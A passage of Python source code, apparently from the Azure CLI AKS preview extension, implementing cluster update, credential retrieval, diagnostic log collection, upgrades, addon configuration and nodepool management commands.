load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
nat_gateway_managed_outbound_ip_count=None,
nat_gateway_idle_timeout=None,
api_server_authorized_ip_ranges=None,
enable_pod_security_policy=False,
disable_pod_security_policy=False,
attach_acr=None,
detach_acr=None,
uptime_sla=False,
no_uptime_sla=False,
enable_aad=False,
aad_tenant_id=None,
aad_admin_group_object_ids=None,
enable_ahub=False,
disable_ahub=False,
aks_custom_headers=None,
auto_upgrade_channel=None,
enable_managed_identity=False,
assign_identity=None,
enable_pod_identity=False,
enable_pod_identity_with_kubenet=False,
disable_pod_identity=False,
enable_secret_rotation=False,
disable_secret_rotation=False,
rotation_poll_interval=None,
disable_local_accounts=False,
enable_local_accounts=False,
enable_public_fqdn=False,
disable_public_fqdn=False,
yes=False,
tags=None,
nodepool_labels=None,
windows_admin_password=None,
enable_azure_rbac=False,
disable_azure_rbac=False,
enable_windows_gmsa=False,
gmsa_dns_server=None,
gmsa_root_domain_name=None,
enable_oidc_issuer=False):
# DO NOT MOVE: get all the original parameters and save them as a dictionary
raw_parameters = locals()
from azure.cli.command_modules.acs._consts import DecoratorEarlyExitException
from azure.cli.command_modules.acs.decorator import AKSParamDict
from .decorator import AKSPreviewUpdateDecorator
# decorator pattern
aks_update_decorator = AKSPreviewUpdateDecorator(
cmd=cmd,
client=client,
raw_parameters=AKSParamDict(raw_parameters),
resource_type=CUSTOM_MGMT_AKS_PREVIEW,
)
try:
# update mc profile
mc = aks_update_decorator.update_mc_preview_profile()
except DecoratorEarlyExitException:
# exit gracefully
return None
# send request to update the real managed cluster
return aks_update_decorator.update_mc_preview(mc)
# pylint: disable=unused-argument
def aks_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def aks_get_credentials(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
admin=False,
user='clusterUser',
path=os.path.join(os.path.expanduser(
'~'), '.kube', 'config'),
overwrite_existing=False,
context_name=None,
public_fqdn=False):
credentialResults = None
serverType = None
if public_fqdn:
serverType = 'public'
if admin:
credentialResults = client.list_cluster_admin_credentials(
resource_group_name, name, serverType)
else:
if user.lower() == 'clusteruser':
credentialResults = client.list_cluster_user_credentials(
resource_group_name, name, serverType)
elif user.lower() == 'clustermonitoringuser':
credentialResults = client.list_cluster_monitoring_user_credentials(
resource_group_name, name, serverType)
else:
raise CLIError("The user is invalid.")
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(
encoding='UTF-8')
_print_or_merge_credentials(
path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
# pylint: disable=line-too-long
def aks_kollect(cmd, # pylint: disable=too-many-statements,too-many-locals
client,
resource_group_name,
name,
storage_account=None,
sas_token=None,
container_logs=None,
kube_objects=None,
node_logs=None):
colorama.init()
mc = client.get(resource_group_name, name)
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
storage_account_id = None
if storage_account is None:
print("No storage account specified. Try getting storage account from diagnostic settings")
storage_account_id = get_storage_account_from_diag_settings(
cmd.cli_ctx, resource_group_name, name)
if storage_account_id is None:
raise CLIError(
"A storage account must be specified, since there isn't one in the diagnostic settings.")
from msrestazure.tools import (is_valid_resource_id, parse_resource_id,
resource_id)
if storage_account_id is None:
if not is_valid_resource_id(storage_account):
storage_account_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Storage', type='storageAccounts',
name=storage_account
)
else:
storage_account_id = storage_account
if is_valid_resource_id(storage_account_id):
try:
parsed_storage_account = parse_resource_id(storage_account_id)
except CloudError as ex:
raise CLIError(ex.message)
else:
raise CLIError("Invalid storage account id %s" % storage_account_id)
storage_account_name = parsed_storage_account['name']
readonly_sas_token = None
if sas_token is None:
storage_client = cf_storage(
cmd.cli_ctx, parsed_storage_account['subscription'])
storage_account_keys = storage_client.storage_accounts.list_keys(parsed_storage_account['resource_group'],
storage_account_name)
kwargs = {
'account_name': storage_account_name,
'account_key': storage_account_keys.keys[0].value
}
cloud_storage_client = cloud_storage_account_service_factory(
cmd.cli_ctx, kwargs)
sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rwdlacup',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rl',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = readonly_sas_token.strip('?')
from knack.prompting import prompt_y_n
print()
print('This will deploy a daemon set to your cluster to collect logs and diagnostic information and '
f'save them to the storage account '
f'{colorama.Style.BRIGHT}{colorama.Fore.GREEN}{storage_account_name}{colorama.Style.RESET_ALL} as '
f'outlined in {format_hyperlink("http://aka.ms/AKSPeriscope")}.')
print()
print('If you share access to that storage account to Azure support, you consent to the terms outlined'
f' in {format_hyperlink("http://aka.ms/DiagConsent")}.')
print()
if not prompt_y_n('Do you confirm?', default="n"):
return
print()
print("Getting credentials for cluster %s " % name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name,
name, admin=True, path=temp_kubeconfig_path)
print()
print("Starts collecting diag info for cluster %s " % name)
# Form containerName from fqdn, as it was previously jsut the location of code is changed.
# https://docs.microsoft.com/en-us/rest/api/storageservices/naming-and-referencing-containers--blobs--and-metadata#container-names
maxContainerNameLength = 63
fqdn = mc.fqdn if mc.fqdn is not None else mc.private_fqdn
normalized_container_name = fqdn.replace('.', '-')
len_of_container_name = normalized_container_name.index("-hcp-")
if len_of_container_name == -1:
len_of_container_name = maxContainerNameLength
container_name = normalized_container_name[:len_of_container_name]
sas_token = sas_token.strip('?')
deployment_yaml = _read_periscope_yaml()
deployment_yaml = deployment_yaml.replace("# <accountName, string>", storage_account_name)
deployment_yaml = deployment_yaml.replace("# <saskey, base64 encoded>",
(base64.b64encode(bytes("?" + sas_token, 'ascii'))).decode('ascii'))
deployment_yaml = deployment_yaml.replace("# <containerName, string>", container_name)
yaml_lines = deployment_yaml.splitlines()
for index, line in enumerate(yaml_lines):
if "DIAGNOSTIC_CONTAINERLOGS_LIST" in line and container_logs is not None:
yaml_lines[index] = line + ' ' + container_logs
if "DIAGNOSTIC_KUBEOBJECTS_LIST" in line and kube_objects is not None:
yaml_lines[index] = line + ' ' + kube_objects
if "DIAGNOSTIC_NODELOGS_LIST" in line and node_logs is not None:
yaml_lines[index] = line + ' ' + node_logs
deployment_yaml = '\n'.join(yaml_lines)
fd, temp_yaml_path = tempfile.mkstemp()
temp_yaml_file = os.fdopen(fd, 'w+t')
try:
temp_yaml_file.write(deployment_yaml)
temp_yaml_file.flush()
temp_yaml_file.close()
try:
print()
print("Cleaning up aks-periscope resources if existing")
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"serviceaccount,configmap,daemonset,secret",
"--all", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding-view", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRole",
"aks-periscope-role", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"--all",
"apd", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.DEVNULL)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"CustomResourceDefinition",
"diagnostics.aks-periscope.azure.github.com", "--ignore-not-found"],
stderr=subprocess.STDOUT)
print()
print("Deploying aks-periscope")
subprocess.check_output(["kubectl", "--kubeconfig", temp_kubeconfig_path, "apply", "-f",
temp_yaml_path, "-n", "aks-periscope"], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
finally:
os.remove(temp_yaml_path)
print()
token_in_storage_account_url = readonly_sas_token if readonly_sas_token is not None else sas_token
log_storage_account_url = f"https://{storage_account_name}.blob.core.windows.net/" \
f"{_trim_fqdn_name_containing_hcp(container_name)}?{token_in_storage_account_url}"
print(f'{colorama.Fore.GREEN}Your logs are being uploaded to storage account {format_bright(storage_account_name)}')
print()
print(f'You can download Azure Storage Explorer here '
f'{format_hyperlink("https://azure.microsoft.com/en-us/features/storage-explorer/")}'
f' to check the logs by adding the storage account using the following URL:')
print(f'{format_hyperlink(log_storage_account_url)}')
print()
if not prompt_y_n('Do you want to see analysis results now?', default="n"):
print(f"You can run 'az aks kanalyze -g {resource_group_name} -n {name}' "
f"anytime to check the analysis results.")
else:
display_diagnostics_report(temp_kubeconfig_path)
def _read_periscope_yaml():
curr_dir = os.path.dirname(os.path.realpath(__file__))
periscope_yaml_file = os.path.join(curr_dir, "deploymentyaml", "aks-periscope.yaml")
yaml_file = open(periscope_yaml_file, "r")
data_loaded = yaml_file.read()
return data_loaded
def aks_kanalyze(cmd, client, resource_group_name, name):
colorama.init()
client.get(resource_group_name, name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name,
name, admin=True, path=temp_kubeconfig_path)
display_diagnostics_report(temp_kubeconfig_path)
def aks_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
node_count,
nodepool_name="",
no_wait=False):
instance = client.get(resource_group_name, name)
_fill_defaults_for_pod_identity_profile(instance.pod_identity_profile)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
raise CLIError('There are more than one node pool in the cluster. '
'Please specify nodepool name or use az aks nodepool command to scale node pool')
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
if agent_profile.enable_auto_scaling:
raise CLIError(
"Cannot scale cluster autoscaler enabled node pool.")
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
def aks_upgrade(cmd, # pylint: disable=unused-argument, too-many-return-statements
client,
resource_group_name,
name,
kubernetes_version='',
control_plane_only=False,
no_wait=False,
node_image_only=False,
aks_custom_headers=None,
yes=False):
from knack.prompting import prompt_y_n
msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
if not yes and not prompt_y_n(msg, default="n"):
return None
instance = client.get(resource_group_name, name)
_fill_defaults_for_pod_identity_profile(instance.pod_identity_profile)
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
'If you only want to upgrade the node version please use the "--node-image-only" option only.')
if node_image_only:
msg = "This node image upgrade operation will run across every node pool in the cluster " \
"and might take a while. Do you wish to continue?"
if not yes and not prompt_y_n(msg, default="n"):
return None
# This only provide convenience for customer at client side so they can run az aks upgrade to upgrade all
# nodepools of a cluster. The SDK only support upgrade single nodepool at a time.
for agent_pool_profile in instance.agent_pool_profiles:
if vmas_cluster:
raise CLIError('This cluster is not using VirtualMachineScaleSets. Node image upgrade only operation '
'can only be applied on VirtualMachineScaleSets cluster.')
agent_pool_client = cf_agent_pools(cmd.cli_ctx)
_upgrade_single_nodepool_image_version(
True, agent_pool_client, resource_group_name, name, agent_pool_profile.name, None)
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
upgrade_all = False
instance.kubernetes_version = kubernetes_version
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
agent_profile.creation_data = None
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance, headers=headers)
def _upgrade_single_nodepool_image_version(no_wait, client, resource_group_name, cluster_name, nodepool_name, snapshot_id=None):
headers = {}
if snapshot_id:
headers["AKSSnapshotId"] = snapshot_id
return sdk_no_wait(no_wait, client.begin_upgrade_node_image_version, resource_group_name, cluster_name, nodepool_name, headers=headers)
def _handle_addons_args(cmd, # pylint: disable=too-many-statements
addons_str,
subscription_id,
resource_group_name,
addon_profiles=None,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
aci_subnet_name=None,
vnet_subnet_id=None,
enable_secret_rotation=False,
rotation_poll_interval=None,):
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles[CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles[CONST_KUBE_DASHBOARD_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = sanitize_loganalytics_ws_resource_id(workspace_resource_id)
addon_profiles[CONST_MONITORING_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True,
config={CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id,
CONST_MONITORING_USING_AAD_MSI_AUTH: enable_msi_auth_for_monitoring})
addons.remove('monitoring')
elif workspace_resource_id:
raise CLIError(
'"--workspace-resource-id" requires "--enable-addons monitoring".')
if 'azure-policy' in addons:
addon_profiles[CONST_AZURE_POLICY_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('azure-policy')
if 'gitops' in addons:
addon_profiles['gitops'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('gitops')
if 'ingress-appgw' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile
addons.remove('ingress-appgw')
if 'open-service-mesh' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
addon_profiles[CONST_OPEN_SERVICE_MESH_ADDON_NAME] = addon_profile
addons.remove('open-service-mesh')
if 'azure-keyvault-secrets-provider' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={CONST_SECRET_ROTATION_ENABLED: "false", CONST_ROTATION_POLL_INTERVAL: "2m"})
if enable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
if rotation_poll_interval is not None:
addon_profile.config[CONST_ROTATION_POLL_INTERVAL] = rotation_poll_interval
addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
addons.remove('azure-keyvault-secrets-provider')
if 'confcom' in addons:
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
addon_profiles[CONST_CONFCOM_ADDON_NAME] = addon_profile
addons.remove('confcom')
if 'virtual-node' in addons:
if not aci_subnet_name or not vnet_subnet_id:
raise CLIError(
'"--enable-addons virtual-node" requires "--aci-subnet-name" and "--vnet-subnet-id".')
# TODO: how about aciConnectorwindows, what is its addon name?
os_type = 'Linux'
addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + os_type] = ManagedClusterAddonProfile(
enabled=True,
config={CONST_VIRTUAL_NODE_SUBNET_NAME: aci_subnet_name}
)
addons.remove('virtual-node')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
fqdn_subdomain=None,
location=None,
name=None):
file_name_aks = 'aksServicePrincipal.json'
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, try to load it from local disk
principal_obj = load_acs_service_principal(
subscription_id, file_name=file_name_aks)
if principal_obj:
service_principal = principal_obj.get('service_principal')
client_secret = principal_obj.get('client_secret')
else:
# Nothing to load, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
if dns_name_prefix:
url = 'http://{}.{}.{}.cloudapp.azure.com'.format(
salt, dns_name_prefix, location)
else:
url = 'http://{}.{}.{}.cloudapp.azure.com'.format(
salt, fqdn_subdomain, location)
service_principal = _build_service_principal(
rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError(
'--client-secret is required if --service-principal is specified')
store_acs_service_principal(
subscription_id, client_secret, service_principal, file_name=file_name_aks)
return load_acs_service_principal(subscription_id, file_name=file_name_aks)
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError(
'Please specify both min-count and max-count when --enable-cluster-autoscaler enabled')
if int(min_count) > int(max_count):
raise CLIError(
'value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError(
'node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
raise CLIError(
'min-count and max-count are required for --enable-cluster-autoscaler, please use the flag')
def _create_client_secret():
# Add a special character to satsify AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(
os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _ensure_aks_acr(cli_ctx,
client_id,
acr_name_or_id,
subscription_id, # pylint: disable=unused-argument
detach=False):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(
cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(
parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(
cli_ctx, client_id, registry.id, detach)
return
# Check if the ACR exists by name accross all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(
cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError(
"ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
def _ensure_aks_acr_role_assignment(cli_ctx,
client_id,
registry_id,
detach=False):
if detach:
if not _delete_role_assignments(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not add_role_assignment(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def aks_agentpool_show(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, # pylint: disable=unused-argument,too-many-locals
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
kubernetes_version=None,
node_zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
node_vm_size=None,
node_osdisk_type=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
pod_subnet_id=None,
ppg=None,
max_pods=0,
os_type=None,
os_sku=None,
enable_fips_image=False,
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
scale_down_mode=CONST_SCALE_DOWN_MODE_DELETE,
node_taints=None,
priority=CONST_SCALE_SET_PRIORITY_REGULAR,
eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
spot_max_price=float('nan'),
labels=None,
max_surge=None,
mode="User",
aks_custom_headers=None,
kubelet_config=None,
linux_os_config=None,
enable_encryption_at_host=False,
enable_ultra_ssd=False,
workload_runtime=None,
gpu_instance_profile=None,
snapshot_id=None,
crg_id=None,
no_wait=False):
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
upgradeSettings = AgentPoolUpgradeSettings()
taints_array = []
creationData = None
if snapshot_id:
snapshot = _get_snapshot(cmd.cli_ctx, snapshot_id)
if not kubernetes_version:
kubernetes_version = snapshot.kubernetes_version
if not os_type:
os_type = snapshot.os_type
if not os_sku:
os_sku = snapshot.os_sku
if not node_vm_size:
node_vm_size = snapshot.vm_size
creationData = CreationData(
source_resource_id=snapshot_id
)
if not os_type:
os_type = "Linux"
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError(
'Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
if node_vm_size is None:
if os_type == "Windows":
node_vm_size = "Standard_D2s_v3"
else:
node_vm_size = "Standard_DS2_v2"
if max_surge:
upgradeSettings.max_surge = max_surge
agent_pool = AgentPool(
name=nodepool_name,
tags=tags,
node_labels=labels,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
os_sku=os_sku,
enable_fips=enable_fips_image,
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
pod_subnet_id=pod_subnet_id,
proximity_placement_group_id=ppg,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=node_zones,
enable_node_public_ip=enable_node_public_ip,
node_public_ip_prefix_id=node_public_ip_prefix_id,
node_taints=taints_array,
scale_set_priority=priority,
scale_down_mode=scale_down_mode,
upgrade_settings=upgradeSettings,
enable_encryption_at_host=enable_encryption_at_host,
enable_ultra_ssd=enable_ultra_ssd,
mode=mode,
workload_runtime=workload_runtime,
gpu_instance_profile=gpu_instance_profile,
creation_data=creationData,
capacity_reservation_group_id=crg_id
)
if priority == CONST_SCALE_SET_PRIORITY_SPOT:
agent_pool.scale_set_eviction_policy = eviction_policy
if isnan(spot_max_price):
spot_max_price = -1
agent_pool.spot_max_price = spot_max_price
_check_cluster_autoscaler_flag(
enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool.os_disk_type = node_osdisk_type
if kubelet_config:
agent_pool.kubelet_config = _get_kubelet_config(kubelet_config)
if linux_os_config:
agent_pool.linux_os_config = _get_linux_os_config(linux_os_config)
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool, headers=headers)
def aks_agentpool_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if instance.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
if new_node_count == instance.count:
raise CLIError(
"The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
kubernetes_version='',
no_wait=False,
node_image_only=False,
max_surge=None,
aks_custom_headers=None,
snapshot_id=None):
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version.'
'If you only want to upgrade the node version please use the "--node-image-only" option only.')
if node_image_only:
return _upgrade_single_nodepool_image_version(no_wait,
client,
resource_group_name,
cluster_name,
nodepool_name,
snapshot_id)
creationData = None
if snapshot_id:
snapshot = _get_snapshot(cmd.cli_ctx, snapshot_id)
if not kubernetes_version and not node_image_only:
kubernetes_version = snapshot.kubernetes_version
creationData = CreationData(
source_resource_id=snapshot_id
)
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
instance.creation_data = creationData
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance, headers=headers)
def aks_agentpool_get_upgrade_profile(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
return client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_update(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
scale_down_mode=None,
min_count=None, max_count=None,
max_surge=None,
mode=None,
labels=None,
node_taints=None,
no_wait=False):
update_autoscaler = enable_cluster_autoscaler + \
disable_cluster_autoscaler + update_cluster_autoscaler
if (update_autoscaler != 1 and not tags and not scale_down_mode and not mode and not max_surge and labels is None and node_taints is None):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--tags" or "--mode" or "--max-surge" or "--scale-down-mode" or "--labels" or "--node-taints')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
if node_taints is not None:
taints_array = []
if node_taints != '':
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise InvalidArgumentValueError(
'Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
instance.node_taints = taints_array
if min_count is None or max_count is None:
